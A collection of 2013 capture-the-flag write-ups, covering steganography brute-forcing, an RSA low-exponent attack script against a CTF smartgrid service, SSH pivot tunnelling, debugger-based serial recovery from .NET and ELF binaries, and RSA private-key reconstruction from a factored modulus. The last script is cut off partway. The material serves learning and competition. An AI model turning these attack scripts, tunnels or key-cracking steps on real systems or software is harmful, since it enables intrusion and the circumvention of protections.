# CSCamp CTF Quals 2k13: Steganography - stega4.wav


# ./keygen 4 "{a..z}" | xargs -I {} steghide extract -sf stega4.wav -p {}
wrote extracted data to "flag.zip".
# fcrackzip -u -c aA1! -p aaaaa flag.zip
PASSWORD FOUND!!!!: pw == 3L33t
# unzip -P 3L33t flag.zip && cat flag.txt
Archive:  flag.zip
  inflating: flag.txt
The Flag is {a57085396f9200c6d38ff66ffa1d3c71}

# rwthCTF 2k13 - smartgrid


# cat grid.pub
-----BEGIN PUBLIC KEY-----
MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEA0pbD0fyDY0sVLMBlEN+g
iGIHjY5KdCTKn722qjmOK6J7Y8r8JDpu01YXmroDjtjy0FAk1C2+ofdZIoVVqms3
8kuXnUOziSHuhK3fpPZbh560G5t7KDBIH6mQ3h0xiLaJpaZClL1QFE7OPFvIexnO
nJoBQbU2R9hpUVRJ18XmgAwCfilNlD6tgp1Ewlou3cPvWP5S2YvfiBPzn0/kSgmP
mx5vABDacygL8BqCSWW7tKRhSXtzAqarve6qOaAjW9JOcyrnmHQEyzahaFIUBpob
OnMFQT1gBPZ/J9bdRUy+OGllYXzaua8/+wuCNAXOJYd43h2QRfl25ULNqyd5zZcE
+hIJtVdoAy3Qdw4zOLqeeo+YPnBR/5rV3R8rFG20yHp3adnHocPyV2uo987vtP4U
pt6URFyI8x2wvTpscjMHWdAQ8vq804OPnagXz0j0Rgw9+BvyD1StiaZHIlYUT0u4
PHG1ynG1solOx1O9jn9aBTTks/0jZGUy+Romgh3Wqfawivnc2Lry5hwCHwMz5NZ+
xoatZlyzd6NCyFcSROctIo4Qw5V0FIbFpx5RNjwNQ4cQvYcKHjmwTwQWiL+6MOWu
GRKIOABJcAXGBnpPUQKAP6JFuORxqD5h1tOQhk1T2ef1FbwKJIwgsVAlGIJNkEq1
G+sEadzv1qowDAbkEFKTKT0CAQM=
-----END PUBLIC KEY-----
# openssl rsa -pubin -inform PEM -text -noout < grid.pub | grep '('
Public-Key: (4096 bit)
Exponent: 3 (0x3)
# ipython
: import gmpy
: message = 2**1024
: modulus = gmpy.mpz(2**4096)
: cube_root = modulus.root(3)[0]
: if message < cube_root:
    print "Go!"
Go!
# cat netlib.py
import socket
import time

# Socket Client
class sc:
        def __init__(self, host, port, layer4):
                self.host = host
                self.port = int(port)
                self.layer4 = layer4

        def connect(self, max_retries, pause):
                if self.layer4 == "tcp":
                        socket_type = socket.SOCK_STREAM
                elif self.layer4 == "udp":
                        socket_type = socket.SOCK_DGRAM
                self.socket = socket.socket(socket.AF_INET, socket_type)
                retries = 0
                while True:
                        try:
                                self.socket.connect((self.host, self.port))
                                return True
                        except:
                                retries += 1
                                if retries == max_retries:
                                        print "Unable to connect."
                                        return False
                                time.sleep(pause)

        def send(self, data):
                try:
                        count = self.socket.send(data)
                except:
                        print "Unable to send data."
                        return False

                if count == len(data):
                        return True
                else:
                        print "Unable to send all data."
                        return False

        def recv(self, buffsize, timeout):
                data = None
                self.socket.settimeout(timeout)
                try:
                        data = self.socket.recv(buffsize)
                except socket.timeout:
                        print "Receive timeout"
                except:
                        print "Unexpected exception while receiving"
                self.socket.settimeout(None)
                return data

        def close(self):
                self.socket.close()
# cat smartgrid.py
#!/usr/bin/python

import gmpy
import hashlib
import netlib
import sys
import time

buffsize = 4096
max_retries = 2
pause = 0.5
timeout = 2

ip = sys.argv[1]
port = sys.argv[2]
proto = sys.argv[3]

def cube_root_attack(message):
        # if e = 3 and m < n**1/3 then c = m**3
        m = gmpy.mpz(message)
        cube_root= m.root(3)[0]
        sha = hashlib.sha256()
        sha.update(str(cube_root))
        return sha.hexdigest()

sc = netlib.sc(ip, port, proto)
if sc.connect(max_retries, pause):
        while True:
                data = sc.recv(buffsize, timeout)
                if data.endswith(">"):
                        break

        if sc.send("help\r\n") == False:
                sys.exit()
        help = ""
        while True:
                data = sc.recv(buffsize, timeout)
                if data.endswith(">"):
                        help += data[:-1]
                        break
                else:
                        help += data

        if help.find("readstatus") == -1: # Is admin mode active?
                if sc.send("admin\r\n") == False:
                        sys.exit()
                data = sc.recv(buffsize, timeout)
                if data == None:
                        sys.exit()
                challenge = data.split('=')[1]
                solution = cube_root_attack(int(challenge))
                if sc.send("answer=" + solution + "\r\n") == False:
                        sys.exit()
                while True:
                        data = sc.recv(buffsize, timeout)
                        if data.endswith(">"):
                                break

        if sc.send("listconsumers" + "\r\n") == False:
                sys.exit()
        listconsumers = ""
        while True:
                data = sc.recv(buffsize, timeout)
                if data.endswith(">"):
                        listconsumers += data[:-2]
                        break
                else:
                        listconsumers += data
        listconsumers = listconsumers[15:-2]
        listconsumers = listconsumers.replace("'","")
        uuids = listconsumers.split(", ")
        uuids.reverse()

        for i in range(30):
                if sc.send("readstatus " + uuids[i] + "\r\n") == False:
                        sys.exit()
                result = ""
                while True:
                        data = sc.recv(buffsize, timeout)
                        if data.endswith(">"):
                                result += data[:-2]
                                break
                        else:
                                result += data
                pos = result.find("status=")
                status = result[pos+7:pos+23]
                pos = result.find("tstamp=")
                tstamp = result[pos+7:pos+17]
                if int(time.time()) - int(tstamp) < 15 * 60: # Last 15 minutes
                        print status # Flag
        sc.close()
# ./smartgrid.py 10.22.x.1 21721 tcp
References

http://h4des.org/blog/index.php?/archives/339-rwthCTF-2013-smartgrid-write-up.html

# Connecting two private hosts through a public pivot


A reverse ssh tunnel, from host1 to pivot

host1# ssh -R localhost:1337:localhost:1234 -f -N root@pivot
host1# nc -l localhost 1234

A proxy ssh tunnel, from host2 to pivot

host2# ssh -L localhost:1234:localhost:1337 -f -N root@pivot
host2# nc localhost 1234

Port forwarding and tunneling

[host2:r---host2:1234] => host2:x---pivot:22 => [pivot:s---pivot:1337]*
[pivot:s---pivot:1337]*=> pivot:22--host1:y  => [host1:t---host1:1234]

# CSCamp CTF Quals 2k13: Reversing - Challenge (dotnet)


# file challenge.exe
challenge.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Run challenge.exe:
. Username = Cookie
. Serial Number = Monsters
. Check
> Authentication failed!

Attach to the process using windbg:
> * Load SOS and symbols
> .loadby sos mscorwks; .symfix; .reload
> * Show all threads
> ~
   0  Id: 3180.39b0 Suspend: 1 Teb: 7ffdf000 Unfrozen
   1  Id: 3180.30a8 Suspend: 1 Teb: 7ffde000 Unfrozen
   2  Id: 3180.3ad8 Suspend: 1 Teb: 7ffdd000 Unfrozen
   3  Id: 3180.3a6c Suspend: 1 Teb: 7ffdc000 Unfrozen
.  4  Id: 3180.38e0 Suspend: 1 Teb: 7ffdb000 Unfrozen
> * Show all managed threads
> !threads
ThreadCount: 2
UnstartedThread: 0
BackgroundThread: 1
PendingThread: 0
DeadThread: 0
Hosted Runtime: no
                                      PreEmptive   GC Alloc           Lock
       ID OSID ThreadOBJ    State     GC       Context       Domain   Count APT Exception
   0    1 39b0 0015b1b8      6020 Enabled  00000000:00000000 001653f8     0 STA
   2    2 3ad8 0015ec68      b220 Enabled  00000000:00000000 001653f8     0 MTA (Finalizer)
> * Switch to thread 0 (new current thread)
> ~0s
eax=03370088 ebx=013d8740 ecx=00001f40 edx=001a2c58 esi=01400ed0 edi=014322f4
eip=7c91e514 esp=0012ed8c ebp=0012ee20 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
7c91e514 c3              ret
> * View the stack
> !clrstack
OS Thread Id: 0x39b0 (0)
ESP       EIP
0012ed98 7c91e514 [InlinedCallFrame: 0012ed98] System.Windows.Forms.UnsafeNativeMethods.WaitMessage()
0012ed94 7b1d8e78 System.Windows.Forms.Application+ComponentManager.System.Windows.Forms.UnsafeNativeMethods.IMsoComponentManager.FPushMessageLoop(Int32, Int32, Int32)
0012ee30 7b1d8967 System.Windows.Forms.Application+ThreadContext.RunMessageLoopInner(Int32, System.Windows.Forms.ApplicationContext)
0012ee84 7b1d87b1 System.Windows.Forms.Application+ThreadContext.RunMessageLoop(Int32, System.Windows.Forms.ApplicationContext)
0012eeb4 7b195921 System.Windows.Forms.Application.Run(System.Windows.Forms.Form)
0012eec8 00de5498 (System.Windows.Forms.Form)
0012eecc 00de1eee StarwareCTF_DotNetChall.Program.Main()
0012f148 79e71b4c [CustomGCFrame: 0012f148]
0012f110 79e71b4c [GCFrame: 0012f110]
0012f12c 79e71b4c [GCFrame: 0012f12c]
0012f310 79e71b4c [HelperMethodFrame_1OBJ: 0012f310] System.RuntimeMethodHandle._InvokeMethodFast(System.Object, System.Object[], System.SignatureStruct ByRef, System.Reflection.MethodAttributes, System.RuntimeTypeHandle)
0012f380 792d5608 System.RuntimeMethodHandle.InvokeMethodFast(System.Object, System.Object[], System.Signature, System.Reflection.MethodAttributes, System.RuntimeTypeHandle)
0012f3d0 792d540f System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo, Boolean)
0012f40c 792d529e System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo)
0012f42c 00de0294 CompressShell.Main(System.String[])
> * Show objects on the heap (MT = MethodTable)
> !dumpheap -type StarwareCTF_DotNetChall
 Address       MT     Size
013d7cf4 00a0732c      348
total 1 objects
Statistics:
      MT    Count    TotalSize Class Name
00a0732c        1          348 StarwareCTF_DotNetChall.MainForm
Total 1 objects
0012f688 79e71b4c [GCFrame: 0012f688]
> * Show what methods the object exposes
> !dumpmt -md 00a0732c
EEClass: 00df38d8
Module: 00a03d94
Name: StarwareCTF_DotNetChall.MainForm
mdToken: 02000009  (StarwareCTF_DotNetChall, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null)
BaseSize: 0x15c
ComponentSize: 0x0
Number of IFaces in IFaceMap: 15
Slots in VTable: 379
--------------------------------------
MethodDesc Table
   Entry MethodDesc      JIT Name
7b176338   7afe8338   PreJIT System.Windows.Forms.Form.ToString()
79286ac0   79104968   PreJIT System.Object.Equals(System.Object)
79286b30   79104998   PreJIT System.Object.GetHashCode()
7a575e40   7a460c00   PreJIT System.ComponentModel.Component.Finalize()
...
7b7220b0   7afe83e0   PreJIT System.Windows.Forms.Form.OnResizeEnd(System.EventArgs)
00a0c320   00a072a0      JIT StarwareCTF_DotNetChall.MainForm..ctor()
00a0c744   00a072ac      JIT StarwareCTF_DotNetChall.MainForm.checkButton_Click(System.Object, System.EventArgs)
00a0cc58   00a072b8      JIT StarwareCTF_DotNetChall.MainForm.ChangeAuthenticationMessage(System.String)
00a0d018   00a072c4      JIT StarwareCTF_DotNetChall.MainForm.ChangeAuthenticationMessageCallback(System.String)
00a0cc00   00a072d0     NONE StarwareCTF_DotNetChall.MainForm.OnAuthentication(StarwareCTF_DotNetChall.AuthenticationResult)
00a0c330   00a072e4      JIT StarwareCTF_DotNetChall.MainForm.InitializeComponent()
> * Method disassemble
> !U 00a072ac
Normal JIT generated code
StarwareCTF_DotNetChall.MainForm.checkButton_Click(System.Object, System.EventArgs)
Begin 00de54b0, size 12a
00de54b0 55              push    ebp
00de54b1 8bec            mov     ebp,esp
00de54b3 57              push    edi
00de54b4 56              push    esi
00de54b5 53              push    ebx
00de54b6 50              push    eax
00de54b7 8bf9            mov     edi,ecx
00de54b9 b98814bf00      mov     ecx,0BF1488h (MT: StarwareCTF_DotNetChall.KeyVerification)
00de54be e859cbc0ff      call    009f201c (JitHelp: CORINFO_HELP_NEWSFAST)
00de54c3 8bf0            mov     esi,eax
00de54c5 8bce            mov     ecx,esi
00de54c7 ff15c014bf00    call    dword ptr ds:[0BF14C0h] (StarwareCTF_DotNetChall.KeyVerification..ctor(), mdToken: 0600002b)
00de54cd 8b8f44010000    mov     ecx,dword ptr [edi+144h]
00de54d3 ff151815bf00    call    dword ptr ds:[0BF1518h] ((System.Object), mdToken: 060000e8)
00de54d9 8bd8            mov     ebx,eax
00de54db 8b8f48010000    mov     ecx,dword ptr [edi+148h]
00de54e1 ff151815bf00    call    dword ptr ds:[0BF1518h] ((System.Object), mdToken: 060000e8)
00de54e7 50              push    eax
00de54e8 8bd3            mov     edx,ebx
00de54ea 8bce            mov     ecx,esi
00de54ec ff156414bf00    call    dword ptr ds:[0BF1464h] (StarwareCTF_DotNetChall.KeyVerification.CheckKey(System.String, System.String), mdToken: 06000029)
...
> * Display one dword (4b)
> dd 0BF1464h L1
00bf1464  00de5960
> * Method disassemble
> !U 00de5960
Normal JIT generated code
StarwareCTF_DotNetChall.KeyVerification.CheckKey(System.String, System.String)
Begin 00de5960, size 39
>>> 00de5960 55              push    ebp
00de5961 8bec            mov     ebp,esp
00de5963 57              push    edi
00de5964 56              push    esi
00de5965 50              push    eax
00de5966 33c0            xor     eax,eax
00de5968 8945f4          mov     dword ptr [ebp-0Ch],eax
00de596b 8bf1            mov     esi,ecx
00de596d 8bfa            mov     edi,edx
00de596f 8b4d08          mov     ecx,dword ptr [ebp+8]
00de5972 ff15242bbf00    call    dword ptr ds:[0BF2B24h] ((System.Object), mdToken: 060000d8)
00de5978 8bc8            mov     ecx,eax
00de597a 8bd7            mov     edx,edi
00de597c 894df4          mov     dword ptr [ebp-0Ch],ecx
00de597f 8bce            mov     ecx,esi
00de5981 ff157014bf00    call    dword ptr ds:[0BF1470h] (StarwareCTF_DotNetChall.KeyVerification.GenerateKeyFromUsername(System.String), mdToken: 0600002a)
00de5987 8bd0            mov     edx,eax
00de5989 8b4df4          mov     ecx,dword ptr [ebp-0Ch]
00de598c ff15042cbf00    call    dword ptr ds:[0BF2C04h] ((System.String, System.String), mdToken: 060000dc)
00de5992 59              pop     ecx
00de5993 5e              pop     esi
00de5994 5f              pop     edi
00de5995 5d              pop     ebp
00de5996 c20400          ret     4
> * Set breakpoint at address
> bp 00de5987
> * Go
> g
. Username = Cookie
. Serial Number = Monsters
. Check

> * Display Unicode chars
> du eax+c
014d1b00  "0C81B9E71D6397203F2B7C73233FC5A4"
014d1b40  "D9C6450D8037BB12BE9415B950AC3E52"
014d1b80  "1EA1B1C42B4ACD482C83FFBBA8212BE2"
014d1bc0  "28A71FE544E463B59C344F1A41A55262"
> * Clear all breakpoints
> bc *
> * Go
> g
> Authentication failed!
. Username = Cookie
. Serial Number = 0C81B9E71D6397203F2B7C73233FC5A4D9C6450D8037BB12BE9415B950AC3E521EA1B1C42B4ACD482C83FFBBA8212BE228A71FE544E463B59C344F1A41A55262
. Check
> Authentication successful. Waiting for flag

Reference

http://blog.botbie.com/2013/11/21/cscamp-ctf-quals-2013-reversing-150-write-up/

# NcN CTF 2k13: Canada (Base - 1200 pts)


# gunzip howtobasic.gz
# file howtobasic
howtobasic: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=0x1a8f284f3d67ad66c7510bc5353556e8a01db18b, stripped
# chmod +x howtobasic
# gdb --quiet ./howtobasic
(gdb) set disassembly-flavor intel
(gdb) info file
        Entry point: 0x80481c0
(gdb) run
Starting program: /root/ctf/howtobasic
Facebook CTF
Enter flag: ^C
Program received signal SIGINT, Interrupt.
0xf7ffd430 in __kernel_vsyscall ()
(gdb) finish
1234567890
0x080577a2 in ?? ()
(gdb) finish
0x0806d9a6 in ?? ()
(gdb) finish
0x08049b26 in ?? ()
(gdb) finish
0x0804932d in ?? ()
(gdb) finish
0x08049435 in ?? ()
(gdb) finish
0x0804906b in ?? ()
(gdb) finish
0x080483b6 in ?? ()
(gdb) finish
Sorry, that is not correct.
(gdb) b *0x080483b6
(gdb) run
Starting program: /root/ctf/howtobasic
Facebook CTF
Enter flag: 1234567890

(gdb) x/2i 0x080483b6
=> 0x80483b6:   test   eax,eax
   0x80483b8:   jne    0x80483f5
(gdb) x/s $eax
0x80d5298:      "1234567890\n"
(gdb) b *0x80483f5
(gdb) continue
(gdb) x/3i 0x080483f5
=> 0x80483f5:   push   eax
   0x80483f6:   xor    eax,eax
   0x80483f8:   je     0x80483fd
(gdb) b *0x80483fd
(gdb) continue
(gdb) x/2i 0x080483fd
=> 0x80483fd:   pop    eax
   0x80483fe:   jmp    0x8048486
(gdb) b *0x8048486
(gdb) continue
(gdb) x/4i 0x08048486
=> 0x8048486:   mov    eax,DWORD PTR [esp+0x14]
   0x804848a:   sub    eax,0x2
   0x804848d:   cmp    eax,DWORD PTR [esp+0x1c]
   0x8048491:   ja     0x8048403
(gdb) x/xw $esp+0x14
0xffffd604:     0x00000042
(gdb) x/xw $esp+0x1c
0xffffd60c:     0x00000000
(gdb) b *0x8048403
(gdb) continue
(gdb) x/20i 0x08048403
=> 0x8048403:   mov    eax,DWORD PTR [esp+0x1c] // eax = 0x0
   0x8048407:   and    eax,0x7   // eax = 0x0 
   0x804840a:   movzx  eax,BYTE PTR [eax+0x80d108c] // eax = 0x4d [0x80d108c] = "MOVEFAST"
   0x8048411:   not    eax    // eax = 0xffffffb2
   0x8048413:   mov    BYTE PTR [esp+0x1b],al  // [esp+0x1b] = 0x000000b2
   0x8048417:   mov    eax,DWORD PTR [esp+0x1c] // eax = 0x0 
   0x804841b:   mov    edx,DWORD PTR [esp+0x10] // edx = 0x080d5298 [0x080d5298] = "1234567890\n"
   0x804841f:   add    eax,edx   // eax = 0x080d5298
   0x8048421:   movzx  eax,BYTE PTR [eax]  // eax = 0x31
   0x8048424:   not    eax    // eax = 0xffffffce
   0x8048426:   mov    BYTE PTR [esp+0x1a],al  // [esp+0x1a] = 0x0000b2ce
   0x804842a:   mov    edx,DWORD PTR ds:0x80d1088 // edx = 0x80b21e8 [0x80b21e8] = "{\177gtsyjg,xorut21.zb \"t65t~0'\"#5d,-g|t$f1(.dq\177te2.}o##%`lyy`$ x2f"
   0x8048430:   mov    eax,DWORD PTR [esp+0x1c] // eax = 0x0
   0x8048434:   add    eax,edx   // eax = 0x80b21e8
   0x8048436:   movzx  edx,BYTE PTR [eax]  // edx = 0x7b
   0x8048439:   movzx  eax,BYTE PTR [esp+0x1a] // eax = 0xce
   0x804843e:   movzx  ecx,BYTE PTR [esp+0x1b] // ecx = 0xb2
   0x8048443:   xor    eax,ecx   // eax = 0x7c
   0x8048445:   cmp    dl,al   // dl != al
   0x8048447:   je     0x8048481
(gdb) x/5i 0x8048481
   0x8048481:   add    DWORD PTR [esp+0x1c],0x1
   0x8048486:   mov    eax,DWORD PTR [esp+0x14]
   0x804848a:   sub    eax,0x2
   0x804848d:   cmp    eax,DWORD PTR [esp+0x1c]
   0x8048491:   ja     0x8048403
(gdb) quit
# cat canada.py
#!/usr/bin/python

constraint = "{\177gtsyjg,xorut21.zb \"t65t~0'\"#5d,-g|t$f1(.dq\177te2.}o##%`lyy`$ x2f"
xorkey = "MOVEFAST"
key = ""

for i in range(len(constraint)):
        c = ord(constraint[i])
        x = ord(xorkey[i%8])
        #~k ^ ~x = c
        k = ~(c^~x)
        key += hex(k)[2:].decode("hex")
print key
# ./canada.py
60115893a79735aec54ed5ea91fbdbf0ab192e5eea24956fc29fed38466af9a2
# ./howtobasic
Facebook CTF
Enter flag: 60115893a79735aec54ed5ea91fbdbf0ab192e5eea24956fc29fed38466af9a2
Winner! Post your flag.

# NcN CTF 2k13: Algeria (Base - 900 pts)


# echo -n '425a6839314159265359d77d47c600ca357b84e810004070edfd1a082a7fffff2b0000800860083deaf9428555294ad51a5512b4c5365ef11200000000000003410a8cca604668004600000261800068000c9a00000d008554432680d00680034000009a95289ea651a6046d09b4098200c4c01494a6a6940007a806806400007b7b65fec32018b455437f94574ce0c6e89aa40860733f66a6430f6393e3b9dd7cfcbb7d5d7d1cba38eae3a82257a278eb6d36b6b28894a68696858a96a82a95b028c2e26db6844d60d3359ab6b69ad8d95c5ca5aa71a6138a63566da9031018a2d34d929b52b6663260db6aada6cb30cd0438b1049b5559f0299840c94ca9b2ca6ad121a2c26aacd0acc451b4954d343480cb6a9acc622b8ec413d4efdfbff7bbc52354d0a17286a4abf2db616465828b89b10187a3f6f2a9d9bd3a191caa1e2ef2e101cc8b534a8e25354754d491e1f8fa3b97878d4e5324e34bfcf36e240bb2ad09d66db136ccad904b652862d0952ccae96e1616b0b8a5ac8d36d444d81b3656c0352b232b22cd2ad5b6b012b2b22b6d4a62336ab29b0d52c62cc593068b65616b48b26db6d56a9b66d59b5b034b2526616c555caab394495db006d990aeccb0b4a25c615c7358e01cd85b2d956d4660a198a16c50da27246900e2ca90b8c9473556d0a2ada2bb95288c24985cf60d6b32d6a9a594dac406436b6ac11954a30b4c834cab699298db4a564c4dad6b588da9b26a018a6aa985b199a992d531294932d44910814b304c80d02936564866881acda0c6698a81294a02cc44030af363c9b3eb97ab8f8c1cfb83aeb75e7ebae9e7faf77ebeade3ce77edbc7cdeef967acf65d787c20f0536454b36c0d998ab35503686ccd84795550e50f22034b0b5511cd49aa33446c09a8d66a24ca321598596cb535880d890d95b4226cdac8a971252c9153c38054b06a6aab416b22a58a29ad121d2a34924728aae0918ba701570495855cd785550e2205c06a5266ab9491ca1c35550d5017800ec6da6c98aa5649a24334a3166a84b96d8a970256d22534c852cdadac284b5052b56a922d0c4a596a36998c46a98ad98d532d25acb2ad1416916a98165491a14856aa942205002a61668566162d69534ad0c2d16295aca455b0616126c36141929ab5325986832159223101859252c2329b42c9332a8d0834daab4b02c84ad858b16d3584ac8d6b55a180655a86d5546b150655894d2d06d294c90306696ca505050c2b2a349144a4c440aa56ac064d16cb62b2daa1a2d628c5915ad5604cacc952d9828955408519500071631e1f7c1f867f11d2f076331f1821e0db0604cc0a51e54cd10fe906c2531dc02045520201c25547cd09fa1369c5c29564c3d13b3241deef406acc8c633fe8d450b21c001007e2ee48a70a121aefa8f8c' | xxd -p -r | tar xvjf -
main.js
# grep 'var loginScript' main.js | sed 's/var /exports./' > variable.js
# nodejs
> ls = require('./variable.js');
> eval(ls.loginScript.slice(2,-2));
[ 'if (document.getElementById(\'user_pass\').value === "0f97972a0efd34ebb3111ac8ec6976740529df531e94df14d0ee8614a07d153b") { alert(\'win\'); } else { alert(\'try again\'); }' ]

# SecurityArtWork: Reversing challenge


# wget --quiet http://www.securityartwork.es/wp-content/uploads/2013/11/serial.exe
# file serial.exe
serial.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
- Breakpoints
004019B5  |. E8 F6FCFFFF               CALL serial.004016B0
00401776   . 83E8 0F                   SUB EAX,0F
004018FA   . 39C2                      CMP EDX,EAX
- Key function
004018D2   . 8B45 F8                   MOV EAX,DWORD PTR SS:[EBP-8]
004018D5   . 83C0 01                   ADD EAX,1
004018D8   . 8B0485 00404000           MOV EAX,DWORD PTR DS:[EAX*4+404000]
004018DF   . 8B1485 40704000           MOV EDX,DWORD PTR DS:[EAX*4+407040]
004018E6   . 8B45 F8                   MOV EAX,DWORD PTR SS:[EBP-8]
004018E9   . 83C0 02                   ADD EAX,2
004018EC   . 8B0485 00404000           MOV EAX,DWORD PTR DS:[EAX*4+404000]
004018F3   . 8B0485 40704000           MOV EAX,DWORD PTR DS:[EAX*4+407040]
004018FA   . 39C2                      CMP EDX,EAX
004018FC   . 75 0C                     JNZ SHORT serial.0040190A

# cat serial.py
#!/usr/bin/python

check = [0,4,6,0,6,0,0,5,6,3,0,5,6,9,2,5]
key = ""

for i in range(16):
        for j in range(10):
                if i*j % 10 == check[i]:
                        key += str(j)
                        break
print key
# ./serial.py
0430400527053331
# cat serials.py
#!/usr/bin/python

check = [0,4,6,0,6,0,0,5,6,3,0,5,6,9,2,5]
key = ""

def serial(key,p):
        for n in range(10):
                if p*n % 10 == check[p]:
                        if p < 15:
                                serial(key + str(n),p+1)
                        else:
                                print key + str(n)
serial("",0)

C:\> serial.exe 0430400527053331
Valid serial number :-)

# CSCamp CTF Quals 2k13: Steganography - PNG


# file enc.png
enc.png: data
# cat png.py 
#!/usr/bin/python

png = 0x89504e470d0a
enc = 0xf1601c2c3e73

key = str(hex(png^enc))[2:].decode("hex")
print key

encfd = open("enc.png","rb")
data = encfd.read()
encfd.close()
size = len(data)

decfd=open("dec.png","wb")
j = 0

for i in data:
    decfd.write(chr(ord(i)^ord(key[j%6])))
    j+=1

decfd.close()
# ./png.py
x0Rk3y
# file dec.png
dec.png: PNG image data, 640 x 400, 8-bit/color RGBA, non-interlaced

# CSCamp CTF Quals 2k13: Crypto - public is enough! (400 points)


# grep -v - public.pem | tr -d '\n' | base64 -d | openssl asn1parse -inform DER -i
    0:d=0  hl=2 l= 124 cons: SEQUENCE
    2:d=1  hl=2 l=  13 cons:  SEQUENCE
    4:d=2  hl=2 l=   9 prim:   OBJECT            :rsaEncryption
   15:d=2  hl=2 l=   0 prim:   NULL
   17:d=1  hl=2 l= 107 prim:  BIT STRING
# grep -v - public.pem | tr -d '\n' | base64 -d | openssl asn1parse -inform DER -i -strparse 17
    0:d=0  hl=2 l= 104 cons: SEQUENCE
    2:d=1  hl=2 l=  97 prim:  INTEGER           :CAD984557C97E039431A226AD727F0C6D43EF3D418469F1B375049B229843EE9F83B1F97738AC274F5F61F401F21F1913E4B64BB31B55A38D398C0DFED00B1392F0889711C44B359E7976C617FCC734F06E3E95C26476091B52F462E79413DB5
  101:d=1  hl=2 l=   3 prim:  INTEGER           :010001
# openssl rsa -pubin -inform PEM -text -noout < public.pem
Public-Key: (768 bit)
Modulus:
    00:ca:d9:84:55:7c:97:e0:39:43:1a:22:6a:d7:27:
    f0:c6:d4:3e:f3:d4:18:46:9f:1b:37:50:49:b2:29:
    84:3e:e9:f8:3b:1f:97:73:8a:c2:74:f5:f6:1f:40:
    1f:21:f1:91:3e:4b:64:bb:31:b5:5a:38:d3:98:c0:
    df:ed:00:b1:39:2f:08:89:71:1c:44:b3:59:e7:97:
    6c:61:7f:cc:73:4f:06:e3:e9:5c:26:47:60:91:b5:
    2f:46:2e:79:41:3d:b5
Exponent: 65537 (0x10001)
# # Find p and q using this URL http://www.factordb.com/index.php
n = 1230186684530117755130494958384962720772853569595334792197322452151726400507263657518745202199786469389956474942774063845925192557326303453731548268507917026122142913461670429214311602221240479274737794080665351419597459856902143413
p = 33478071698956898786044169848212690817704794983713768568912431388982883793878002287614711652531743087737814467999489
q = 36746043666799590428244633799627952632279158164343087642676032283815739666511279233373417143396810270092798736308917

# ipython
: import gmpy
: p = 33478071698956898786044169848212690817704794983713768568912431388982883793878002287614711652531743087737814467999489
: q = 36746043666799590428244633799627952632279158164343087642676032283815739666511279233373417143396810270092798736308917
: totien = (p-1) * (q-1)
: e = 65537
: d = hex(gmpy.invert(e,totien))
: d
'0x740de48760442835baad5e1990453a9d16db7976d3f8bb98bf99c0c01cbe9b9c12b808c80683d1e346c16c79ac162874f28ca610c1b97e5e1ffae95725ce0c6b031c3e188b17187a793b322cc4004c568e76c9b258542ea2a2d6ecd462fff401'

# cat rsatool.py
#!/usr/bin/python2
import base64, fractions, optparse, random
import gmpy

from pyasn1.codec.der import encoder
from pyasn1.type.univ import *

PEM_TEMPLATE = '-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n'
DEFAULT_EXP = 65537

def factor_modulus(n, d, e):
    """
    Efficiently recover non-trivial factors of n

    See: Handbook of Applied Cryptography
    8.2.2 Security of RSA -> (i) Relation to factoring (p.287)

    http://www.cacr.math.uwaterloo.ca/hac/
    """
    t = (e * d - 1)
    s = 0

    while True:
        quotient, remainder = divmod(t, 2)

        if remainder != 0:
            break

        s += 1
        t = quotient

    found = False

    while not found:
        i = 1
        a = random.randint(1,n-1)

        while i <= s and not found:
            c1 = pow(a, pow(2, i-1, n) * t, n)
            c2 = pow(a, pow(2, i, n) * t, n)

            found = c1 != 1 and c1 != (-1 % n) and c2 == 1

            i += 1

    p = fractions.gcd(c1-1, n)
    q = (n / p)

    return p, q

class RSA:
    def __init__(self, p=None, q=None, n=None, d=None, e=DEFAULT_EXP):
        """
        Initialize RSA instance using primes (p, q)
        or modulus and private exponent (n, d)
        """

        self.e = e

        if p and q:
            assert gmpy.is_prime(p), 'p is not prime'
            assert gmpy.is_prime(q), 'q is not prime'

            self.p = p
            self.q = q
        elif n and d:   
            self.p, self.q = factor_modulus(n, d, e)
        else:
            raise ArgumentError('Either (p, q) or (n, d) must be provided')

        self._calc_values()

    def _calc_values(self):
        self.n = self.p * self.q

        phi = (self.p - 1) * (self.q - 1)
        self.d = gmpy.invert(self.e, phi)

        # CRT-RSA precomputation
        self.dP = self.d % (self.p - 1)
        self.dQ = self.d % (self.q - 1)
        self.qInv = gmpy.invert(self.q, self.p)

    def to_pem(self):
        """
        Return OpenSSL-compatible PEM encoded key
        """
        return PEM_TEMPLATE % base64.encodestring(self.to_der())

    def to_der(self):
        """
        Return parameters as OpenSSL compatible DER encoded key
        """
        seq = Sequence()

        for x in [0, self.n, self.e, self.d, self.p, self.q, self.dP, self.dQ, self.qInv]:
            seq.setComponentByPosition(len(seq), Integer(x))

        return encoder.encode(seq)

    def dump(self, verbose):
        vars = ['n', 'e', 'd', 'p', 'q']

        if verbose:
            vars += ['dP', 'dQ', 'qInv']

        for v in vars:
            self._dumpvar(v)

    def _dumpvar(self, var):
        val = getattr(self, var)

        parts = lambda s, l: '\n'.join([s[i:i+l] for i in xrange(0, len(s), l)])

        if len(str(val)) <= 40:
            print '%s = %d (%#x)\n' % (var, val, val)
        else:
            print '%s =' % var
            print parts('%x' % val, 80) + '\n'


if __name__ == '__main__':
    parser = optparse.OptionParser()

    parser.add_option('-p', dest='p', help='prime', type='int')
    parser.add_option('-q', dest='q', help='prime', type='int')
    parser.add_option('-n', dest='n', help='modulus', type='int')
    parser.add_option('-d', dest='d', help='private exponent', type='int')
